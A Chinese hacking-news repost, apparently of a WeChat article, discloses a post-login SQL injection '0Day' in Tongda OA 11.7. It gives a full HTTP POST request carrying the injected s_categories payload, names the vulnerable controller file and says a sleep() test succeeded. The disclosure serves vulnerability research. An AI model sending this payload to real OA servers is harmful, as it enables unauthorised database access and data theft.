记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

0Day | 通达OA 11.7 存在后台SQL注入漏洞

2020-10-15 01:12


POST /general/appbuilder/web/report/repchart/data HTTP/1.1UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Referer: http://192.168.202.1/general/appbuilder/web/report/repchart?reportId=X-ResourceType: xhrCookie: PHPSESSID=1kqh5um8augkhrq8q6n7t23h46; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=cb7abbefConnection: closeHost: 192.168.202.1Pragma: no-cachex-requested-with: XMLHttpRequestContent-Length: 539x-wvs-id: Acunetix-Deepscan/288Cache-Control: no-cacheaccept: */*origin: http://192.168.202.1Accept-Language: en-UScontent-type: application/x-www-form-urlencoded; charset=UTF-8
data_path=%5B%5D&s_categories="23fd<>select 9j@!fdf" #)&i_dataset=10&params%5BsearchParams%5D%5B0%5D%5Bid%5D=&params%5BsearchParams%5D%5B0%5D%5Bkey%5D=1598155037212&params%5BsearchParams%5D%5B0%5D%5Blabel%5D=%E5%85%AC%E5%91%8AID&params%5BsearchParams%5D%5B0%5D%5Btype%5D=text&params%5BsearchParams%5D%5B0%5D%5Bvalue%5D=&params%5BsearchParams%5D%5B0%5D%5Bscope%5D=equal&params%5BsearchParams%5D%5B0%5D%5Bmacro%5D=false&params%5BsearchParams%5D%5B0%5D%5Btype_of_data%5D=rep&params%5BsearchParams%5D%5B0%5D%5Btype_of_reports%5D=select&id=



漏洞证明:

查看Mysql数据库的执行过程,mysql日志文件,可以发现s_categories传入的参数,被mysql数据库完整执行了,没有任何过滤,可以确定存在 mysql注入漏洞

漏洞文件:

webroot\general\appbuilder\modules\report\controllers\RepChartController.php

测试执行sleep函数,注释后面语句来测试,被成功执行。

挖掘思路:

Fuzz+sql日志关键字匹配+审计

联系微信

 

END.




欢迎转发~

欢迎关注~

欢迎点赞~



知识来源: https://mp.weixin.qq.com/s?__biz=MzU4NTY4MDEzMw==&mid=2247485947&idx=1&sn=18a9f905e3c4e937e44c90a287eaebdb

阅读:26093 | 评论:0 | 标签:0day 注入 漏洞 SQL

想收藏或者和大家分享这篇好文章→复制链接地址

“0Day | 通达OA 11.7 存在后台SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云